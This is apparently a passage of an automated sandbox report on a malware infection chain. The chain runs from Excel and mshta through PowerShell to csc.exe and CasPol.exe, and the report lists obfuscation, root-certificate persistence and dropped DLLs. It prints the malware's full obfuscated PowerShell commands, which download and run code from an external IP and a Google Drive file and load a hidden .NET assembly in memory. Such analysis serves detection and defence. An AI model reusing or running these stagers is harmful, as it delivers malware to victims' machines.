ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"

Compiles C# or VB.Net code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\revod450\revod450.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\revod450\revod450.cmdline"

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

31_2_004044A4

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FE899B022D push eax; iretd	5_2_000007FE899B0241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FE899B00BD pushad ; iretd	5_2_000007FE899B00C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044693D push ecx; ret	31_2_0044694D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044DB70 push eax; ret	31_2_0044DB84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044DB70 push eax; ret	31_2_0044DBAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00451D54 push eax; ret	31_2_00451D61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0044B090 push eax; ret	41_2_0044B0A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0044B090 push eax; ret	41_2_0044B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00451D34 push eax; ret	41_2_00451D41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00444E71 push ecx; ret	41_2_00444E81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00414060 push eax; ret	42_2_00414074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00414060 push eax; ret	42_2_0041409C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00414039 push ecx; ret	42_2_00414049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_004164EB push 0000006Ah; retf	42_2_004165C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00416553 push 0000006Ah; retf	42_2_004165C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00416555 push 0000006Ah; retf	42_2_004165C4

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Jump to behavior

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\revod450\revod450.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.dll			Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

41_2_004047CB

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
